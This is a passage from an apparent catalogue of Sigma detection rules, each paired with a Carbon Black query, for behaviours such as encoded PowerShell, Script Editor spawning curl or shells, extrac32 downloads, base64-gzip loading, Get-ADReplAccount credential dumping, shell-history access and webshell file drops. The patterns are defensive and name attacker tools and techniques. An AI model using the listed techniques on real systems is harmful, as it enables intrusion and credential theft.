            - \pwsh.exe
        CommandLine|contains:
            - ' -e '
            - ' -en '
            - ' -enc '
            - ' -enco'
            - ' -ec '
    filter_encoding:
        CommandLine|contains: ' -Encoding '
    filter_azure:
        ParentImage|contains:
            - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
            - '\gc_worker.exe'
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Execution of Shutdown

Use of the commandline to shutdown or reboot windows

status test author frack113 ATT&CK technique id 34ebb878-1b15-4895-b352-ca2eeb99b274

carbon_black query

Image:\\shutdown.exe (CommandLine:\/r\ * OR CommandLine:\/s\ *)

view Sigma YAML

title: Suspicious Execution of Shutdown
id: 34ebb878-1b15-4895-b352-ca2eeb99b274
status: test
description: Use of the commandline to shutdown or reboot windows
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
author: frack113
date: 2022-01-01
tags:
    - attack.impact
    - attack.t1529
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\shutdown.exe'
        CommandLine|contains:
            - '/r '
            - '/s '
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Execution of Shutdown to Log Out

Detects the rare use of the command line tool shutdown to logoff a user

status test author frack113 ATT&CK technique id ec290c06-9b6b-4338-8b6b-095c0f284f10

carbon_black query

Image:\\shutdown.exe CommandLine:\/l*

view Sigma YAML

title: Suspicious Execution of Shutdown to Log Out
id: ec290c06-9b6b-4338-8b6b-095c0f284f10
status: test
description: Detects the rare use of the command line tool shutdown to logoff a user
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
author: frack113
date: 2022-10-01
tags:
    - attack.impact
    - attack.t1529
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\shutdown.exe'
        CommandLine|contains: '/l'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Execution via macOS Script Editor

Detects when the macOS Script Editor utility spawns an unusual child process.

status test author Tim Rauch (rule), Elastic (idea) ATT&CK sub-technique id 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4

carbon_black query

ParentImage:\/Script\ Editor ((Image:\/curl OR Image:\/bash OR Image:\/sh OR Image:\/zsh OR Image:\/dash OR Image:\/fish OR Image:\/osascript OR Image:\/mktemp OR Image:\/chmod OR Image:\/php OR Image:\/nohup OR Image:\/openssl OR Image:\/plutil OR Image:\/PlistBuddy OR Image:\/xattr OR Image:\/sqlite OR Image:\/funzip OR Image:\/popen) OR (Image:python* OR Image:perl*))

view Sigma YAML

title: Suspicious Execution via macOS Script Editor
id: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4
status: test
description: Detects when the macOS Script Editor utility spawns an unusual child process.
author: Tim Rauch (rule), Elastic (idea)
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685
    - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/
date: 2022-10-21
modified: 2022-12-28
logsource:
    category: process_creation
    product: macos
tags:
    - attack.defense-impairment
    - attack.t1566
    - attack.t1566.002
    - attack.initial-access
    - attack.t1059
    - attack.t1059.002
    - attack.t1204
    - attack.t1204.001
    - attack.execution
    - attack.persistence
    - attack.t1553
detection:
    selection_parent:
        ParentImage|endswith: '/Script Editor'
    selection_img:
        - Image|endswith:
              - '/curl'
              - '/bash'
              - '/sh'
              - '/zsh'
              - '/dash'
              - '/fish'
              - '/osascript'
              - '/mktemp'
              - '/chmod'
              - '/php'
              - '/nohup'
              - '/openssl'
              - '/plutil'
              - '/PlistBuddy'
              - '/xattr'
              - '/sqlite'
              - '/funzip'
              - '/popen'
        - Image|contains:
              - 'python'
              - 'perl'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Extrac32 Alternate Data Stream Execution

Extract data from cab file and hide it in an alternate data stream

status test author frack113 ATT&CK sub-technique id 4b13db67-0c45-40f1-aba8-66a1a7198a1e

carbon_black query

(CommandLine:extrac32.exe* CommandLine:.cab*) CommandLine::[^\\\\]

view Sigma YAML

title: Suspicious Extrac32 Alternate Data Stream Execution
id: 4b13db67-0c45-40f1-aba8-66a1a7198a1e
status: test
description: Extract data from cab file and hide it in an alternate data stream
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
author: frack113
date: 2021-11-26
modified: 2022-12-30
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - extrac32.exe
            - .cab
        CommandLine|re: ':[^\\]'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Extrac32 Execution

Download or Copy file with Extrac32

status test author frack113 ATT&CK technique id aa8e035d-7be4-48d3-a944-102aec04400d

carbon_black query

(CommandLine:extrac32.exe* OR Image:\\extrac32.exe OR OriginalFileName:extrac32.exe) CommandLine:.cab* (CommandLine:\/C* OR CommandLine:\/Y* OR CommandLine:\ \\\\*)

view Sigma YAML

title: Suspicious Extrac32 Execution
id: aa8e035d-7be4-48d3-a944-102aec04400d
status: test
description: Download or Copy file with Extrac32
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
author: frack113
date: 2021-11-26
modified: 2022-08-13
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_lolbas:
        - CommandLine|contains: extrac32.exe
        - Image|endswith: '\extrac32.exe'
        - OriginalFileName: 'extrac32.exe'
    selection_archive:
        CommandLine|contains: '.cab'
    selection_options:
        CommandLine|contains:
            - /C
            - /Y
            - ' \\\\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious File Characteristics Due to Missing Fields

Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe

status test author Markus Neis, Sander Wiebing ATT&CK sub-technique id 9637e8a5-7131-4f7f-bdc7-2b05d8670c43

carbon_black query

((Description:? FileVersion:?) OR (Description:? Product:?) OR (Description:? Company:?)) Image:\\Downloads\\*

view Sigma YAML

title: Suspicious File Characteristics Due to Missing Fields
id: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43
status: test
description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
references:
    - https://securelist.com/muddywater/88059/
    - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection
author: Markus Neis, Sander Wiebing
date: 2018-11-22
modified: 2022-10-09
tags:
    - attack.execution
    - attack.t1059.006
logsource:
    product: windows
    category: process_creation
detection:
    selection1:
        Description: '\?'
        FileVersion: '\?'
    selection2:
        Description: '\?'
        Product: '\?'
    selection3:
        Description: '\?'
        Company: '\?'
    folder:
        Image|contains: '\Downloads\'
    condition: (selection1 or selection2 or selection3) and folder
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious File Created In PerfLogs

Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id bbb7e38c-0b41-4a11-b306-d2a457b7ac2b

carbon_black query

TargetFilename:C\:\\PerfLogs\\* (TargetFilename:.7z OR TargetFilename:.bat OR TargetFilename:.bin OR TargetFilename:.chm OR TargetFilename:.dll OR TargetFilename:.exe OR TargetFilename:.hta OR TargetFilename:.lnk OR TargetFilename:.ps1 OR TargetFilename:.psm1 OR TargetFilename:.py OR TargetFilename:.scr OR TargetFilename:.sys OR TargetFilename:.vbe OR TargetFilename:.vbs OR TargetFilename:.zip)

view Sigma YAML

title: Suspicious File Created In PerfLogs
id: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b
status: test
description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
references:
    - Internal Research
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|startswith: 'C:\PerfLogs\'
        TargetFilename|endswith:
            - '.7z'
            - '.bat'
            - '.bin'
            - '.chm'
            - '.dll'
            - '.exe'
            - '.hta'
            - '.lnk'
            - '.ps1'
            - '.psm1'
            - '.py'
            - '.scr'
            - '.sys'
            - '.vbe'
            - '.vbs'
            - '.zip'
    condition: selection
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS

status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 6b269392-9eba-40b5-acb6-55c882b20ba6

carbon_black query

(Image:\\w3wp.exe CommandLine:MSExchange*) (TargetFilename:.aspx OR TargetFilename:.asp OR TargetFilename:.ashx OR TargetFilename:.ps1 OR TargetFilename:.bat OR TargetFilename:.exe OR TargetFilename:.dll OR TargetFilename:.vbs)

view Sigma YAML

title: Suspicious File Drop by Exchange
id: 6b269392-9eba-40b5-acb6-55c882b20ba6
related:
    - id: bd1212e5-78da-431e-95fa-c58e3237a8e6
      type: similar
status: test
description: Detects suspicious file type dropped by an Exchange component in IIS
references:
    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
author: Florian Roth (Nextron Systems)
date: 2022-10-04
tags:
    - attack.persistence
    - attack.t1190
    - attack.initial-access
    - attack.t1505.003
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\w3wp.exe'
        CommandLine|contains: 'MSExchange'
    selection_types:
        TargetFilename|endswith:
            - '.aspx'
            - '.asp'
            - '.ashx'
            - '.ps1'
            - '.bat'
            - '.exe'
            - '.dll'
            - '.vbs'
    condition: all of selection*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious File Write to Webapps Root Directory

Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.

status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 89c42960-f244-4dad-9151-ae9b1a3287a2

carbon_black query

(Image:\\dotnet.exe OR Image:\\w3wp.exe OR Image:\\java.exe) (TargetFilename:\\apache* OR TargetFilename:\\tomcat*) TargetFilename:\\webapps\\ROOT\\* TargetFilename:.jsp

view Sigma YAML

title: Suspicious File Write to Webapps Root Directory
id: 89c42960-f244-4dad-9151-ae9b1a3287a2
status: experimental
description: |
    Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
    This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
references:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-20
tags:
    - attack.persistence
    - attack.t1505.003
    - attack.initial-access
    - attack.t1190
logsource:
    product: windows
    category: file_event
detection:
    # Add more suspicious processes or paths or extensions as needed
    selection_susp_img:
        Image|endswith:
            - '\dotnet.exe'
            - '\w3wp.exe'
            - '\java.exe'
    selection_servers:
        TargetFilename|contains:
            - '\apache'
            - '\tomcat'
    selection_path:
        TargetFilename|contains: '\webapps\ROOT\'
    selection_susp_extensions:
        TargetFilename|endswith: '.jsp'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Files in Default GPO Folder

Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder

status test author elhoim ATT&CK sub-technique id 5f87308a-0a5b-4623-ae15-d8fa1809bc60

carbon_black query

TargetFilename:\\Policies\\\{31B2F340\-016D\-11D2\-945F\-00C04FB984F9\}\\* (TargetFilename:.dll OR TargetFilename:.exe)

view Sigma YAML

title: Suspicious Files in Default GPO Folder
id: 5f87308a-0a5b-4623-ae15-d8fa1809bc60
status: test
description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
references:
    - https://redcanary.com/blog/intelligence-insights-november-2021/
author: elhoim
date: 2022-04-28
tags:
    - attack.stealth
    - attack.t1036.005
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\'
        TargetFilename|endswith:
            - '.dll'
            - '.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious FromBase64String Usage On Gzip Archive - Process Creation

Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

status test author frack113 ATT&CK sub-technique id d75d6b6b-adb9-48f7-824b-ac2e786efe1f

carbon_black query

CommandLine:FromBase64String* CommandLine:MemoryStream* CommandLine:H4sI*

view Sigma YAML

title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
related:
    - id: df69cb1d-b891-4cd9-90c7-d617d90100ce
      type: similar
status: test
description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
author: frack113
date: 2022-12-23
tags:
    - attack.command-and-control
    - attack.t1132.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'FromBase64String'
            - 'MemoryStream'
            - 'H4sI'
    condition: selection
falsepositives:
    - Legitimate administrative script
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious FromBase64String Usage On Gzip Archive - Ps Script

Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.

status test author frack113 ATT&CK sub-technique id df69cb1d-b891-4cd9-90c7-d617d90100ce

carbon_black query

ScriptBlockText:FromBase64String* ScriptBlockText:MemoryStream* ScriptBlockText:H4sI*

view Sigma YAML

title: Suspicious FromBase64String Usage On Gzip Archive - Ps Script
id: df69cb1d-b891-4cd9-90c7-d617d90100ce
related:
    - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
      type: similar
status: test
description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
author: frack113
date: 2022-12-23
tags:
    - attack.command-and-control
    - attack.t1132.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'FromBase64String'
            - 'MemoryStream'
            - 'H4sI'
    condition: selection
falsepositives:
    - Legitimate administrative script
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Get-ADReplAccount

The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

status test author frack113 ATT&CK sub-technique id 060c3ef1-fd0a-4091-bf46-e7d625f60b73

carbon_black query

ScriptBlockText:Get\-ADReplAccount* ScriptBlockText:\-All\ * ScriptBlockText:\-Server\ *

view Sigma YAML

title: Suspicious Get-ADReplAccount
id: 060c3ef1-fd0a-4091-bf46-e7d625f60b73
status: test
description: |
    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.
    These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
references:
    - https://www.powershellgallery.com/packages/DSInternals
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount
author: frack113
date: 2022-02-06
tags:
    - attack.credential-access
    - attack.t1003.006
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - Get-ADReplAccount
            - '-All '
            - '-Server '
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious GetTypeFromCLSID ShellExecute

Detects suspicious Powershell code that execute COM Objects

status test author frack113 ATT&CK sub-technique id 8bc063d5-3a3a-4f01-a140-bc15e55e8437

carbon_black query

ScriptBlockText:\:\:GetTypeFromCLSID\(* ScriptBlockText:.ShellExecute\(*

view Sigma YAML

title: Suspicious GetTypeFromCLSID ShellExecute
id: 8bc063d5-3a3a-4f01-a140-bc15e55e8437
status: test
description: Detects suspicious Powershell code that execute COM Objects
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object
author: frack113
date: 2022-04-02
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - '::GetTypeFromCLSID('
            - '.ShellExecute('
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Git Clone

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id aef9d1f1-7396-4e92-a927-4567c7a495c1

carbon_black query

((Image:\\git.exe OR Image:\\git\-remote\-https.exe) OR OriginalFileName:git.exe) (CommandLine:\ clone\ * OR CommandLine:git\-remote\-https\ *) (CommandLine:exploit* OR CommandLine:Vulns* OR CommandLine:vulnerability* OR CommandLine:RemoteCodeExecution* OR CommandLine:Invoke\-* OR CommandLine:CVE\-* OR CommandLine:poc\-* OR CommandLine:ProofOfConcept* OR CommandLine:proxyshell* OR CommandLine:log4shell* OR CommandLine:eternalblue* OR CommandLine:eternal\-blue* OR CommandLine:MS17\-*)

view Sigma YAML

title: Suspicious Git Clone
id: aef9d1f1-7396-4e92-a927-4567c7a495c1
status: test
description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2023-01-10
tags:
    - attack.reconnaissance
    - attack.t1593.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\git.exe'
              - '\git-remote-https.exe'
        - OriginalFileName: 'git.exe'
    selection_cli:
        CommandLine|contains:
            - ' clone '
            - 'git-remote-https '
    selection_keyword:
        CommandLine|contains:
            # Add more suspicious keywords
            - 'exploit'
            - 'Vulns'
            - 'vulnerability'
            - 'RemoteCodeExecution'
            - 'Invoke-'
            - 'CVE-'
            - 'poc-'
            - 'ProofOfConcept'
            # Add more vuln names
            - 'proxyshell'
            - 'log4shell'
            - 'eternalblue'
            - 'eternal-blue'
            - 'MS17-'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Git Clone - Linux

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id cfec9d29-64ec-4a0f-9ffe-0fdb856d5446

carbon_black query

(Image:\/git CommandLine:\ clone\ *) (CommandLine:exploit* OR CommandLine:Vulns* OR CommandLine:vulnerability* OR CommandLine:RCE* OR CommandLine:RemoteCodeExecution* OR CommandLine:Invoke\-* OR CommandLine:CVE\-* OR CommandLine:poc\-* OR CommandLine:ProofOfConcept* OR CommandLine:proxyshell* OR CommandLine:log4shell* OR CommandLine:eternalblue* OR CommandLine:eternal\-blue* OR CommandLine:MS17\-*)

view Sigma YAML

title: Suspicious Git Clone - Linux
id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446
status: test
description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2023-01-05
tags:
    - attack.reconnaissance
    - attack.t1593.003
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/git'
        CommandLine|contains: ' clone '
    selection_keyword:
        CommandLine|contains:
            # Add more suspicious keywords
            - 'exploit'
            - 'Vulns'
            - 'vulnerability'
            - 'RCE'
            - 'RemoteCodeExecution'
            - 'Invoke-'
            - 'CVE-'
            - 'poc-'
            - 'ProofOfConcept'
            # Add more vuln names
            - 'proxyshell'
            - 'log4shell'
            - 'eternalblue'
            - 'eternal-blue'
            - 'MS17-'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)

status test author Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id d95de845-b83c-4a9a-8a6a-4fc802ebf6c0

carbon_black query

((Image:\\net.exe OR Image:\\net1.exe) OR (OriginalFileName:net.exe OR OriginalFileName:net1.exe)) ((((CommandLine:\ group\ * OR CommandLine:\ localgroup\ *) (CommandLine:domain\ admins* OR CommandLine:\ administrator* OR CommandLine:\ administrateur* OR CommandLine:enterprise\ admins* OR CommandLine:Exchange\ Trusted\ Subsystem* OR CommandLine:Remote\ Desktop\ Users* OR CommandLine:Utilisateurs\ du\ Bureau\ à\ distance* OR CommandLine:Usuarios\ de\ escritorio\ remoto* OR CommandLine:\ \/do*)) (-CommandLine:\ \/add*)) OR (CommandLine:\ accounts\ * CommandLine:\ \/do*))

view Sigma YAML

title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
status: test
description: |
    Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
    Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
references:
    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
date: 2019-01-16
modified: 2023-03-02
tags:
    - attack.discovery
    - attack.t1087.001
    - attack.t1087.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\net.exe'
              - '\net1.exe'
        - OriginalFileName:
              - 'net.exe'
              - 'net1.exe'
    # Covers group and localgroup flags
    selection_group_root:
        CommandLine|contains:
            - ' group '
            - ' localgroup '
    selection_group_flags:
        CommandLine|contains:
            # Add more groups for other languages
            - 'domain admins'
            - ' administrator' # Typo without an 'S' so we catch both
            - ' administrateur' # Typo without an 'S' so we catch both
            - 'enterprise admins'
            - 'Exchange Trusted Subsystem'
            - 'Remote Desktop Users'
            - 'Utilisateurs du Bureau à distance' # French for "Remote Desktop Users"
            - 'Usuarios de escritorio remoto' # Spanish for "Remote Desktop Users"
            - ' /do' # short for domain
    filter_group_add:
        # This filter is added to avoid the potential case where the point is not recon but addition
        CommandLine|contains: ' /add'
    # Covers 'accounts' flag
    selection_accounts_root:
        CommandLine|contains: ' accounts '
    selection_accounts_flags:
        CommandLine|contains: ' /do' # short for domain
    condition: selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)
falsepositives:
    - Inventory tool runs
    - Administrative activity
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious History File Operations

Detects commandline operations on shell history files

status test author Mikhail Larin, oscd.community ATT&CK sub-technique id 508a9374-ad52-4789-b568-fc358def2c65

carbon_black query

CommandLine:.bash_history* OR CommandLine:.zsh_history* OR CommandLine:.zhistory* OR CommandLine:.history* OR CommandLine:.sh_history* OR CommandLine:fish_history*

view Sigma YAML

title: Suspicious History File Operations
id: 508a9374-ad52-4789-b568-fc358def2c65
status: test
description: Detects commandline operations on shell history files
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1552.003
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '.bash_history'
            - '.zsh_history'
            - '.zhistory'
            - '.history'
            - '.sh_history'
            - 'fish_history'
    condition: selection
falsepositives:
    - Legitimate administrative activity
    - Legitimate software, cleaning hist file
level: medium

Convert to SIEM query

medium Moderate Low FP

Suspicious History File Operations - Linux

Detects commandline operations on shell history files

status test author Mikhail Larin, oscd.community ATT&CK sub-technique id eae8ce9f-bde9-47a6-8e79-f20d18419910

carbon_black query

type:EXECVE (".bash_history" OR ".zsh_history" OR ".zhistory" OR ".history" OR ".sh_history" OR "fish_history")

view Sigma YAML

title: Suspicious History File Operations - Linux
id: eae8ce9f-bde9-47a6-8e79-f20d18419910
status: test
description: 'Detects commandline operations on shell history files'
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2022-11-28
tags:
    - attack.credential-access
    - attack.t1552.003
logsource:
    product: linux
    service: auditd
detection:
    execve:
        type: EXECVE
    history:
        - '.bash_history'
        - '.zsh_history'
        - '.zhistory'
        - '.history'
        - '.sh_history'
        - 'fish_history'
    condition: execve and history
falsepositives:
    - Legitimate administrative activity
    - Legitimate software, cleaning hist file
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Hyper-V Cmdlets

Adversaries may carry out malicious operations using a virtual instance to avoid detection

status test author frack113 ATT&CK sub-technique id 42d36aa1-3240-4db0-8257-e0118dcdd9cd

carbon_black query

ScriptBlockText:New\-VM* OR ScriptBlockText:Set\-VMFirmware* OR ScriptBlockText:Start\-VM*

view Sigma YAML

title: Suspicious Hyper-V Cmdlets
id: 42d36aa1-3240-4db0-8257-e0118dcdd9cd
status: test
description: Adversaries may carry out malicious operations using a virtual instance to avoid detection
references:
    - https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine
author: frack113
date: 2022-04-09
tags:
    - attack.stealth
    - attack.t1564.006
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - New-VM
            - Set-VMFirmware
            - Start-VM
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious IIS URL GlobalRules Rewrite Via AppCmd

Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 7c8af9b2-dcae-41a2-a9db-b28c288b5f08

carbon_black query

(Image:\\appcmd.exe OR OriginalFileName:appcmd.exe) (CommandLine:set* CommandLine:config* CommandLine:section\:system.webServer\/rewrite\/globalRules* CommandLine:commit\:*)

view Sigma YAML

title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
id: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08
status: test
description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
references:
    - https://twitter.com/malmoeb/status/1616702107242971144
    - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\appcmd.exe'
        - OriginalFileName: 'appcmd.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'set'
            - 'config'
            - 'section:system.webServer/rewrite/globalRules'
            - 'commit:'
    condition: all of selection_*
falsepositives:
    - Legitimate usage of appcmd to add new URL rewrite rules
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious IO.FileStream

Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.

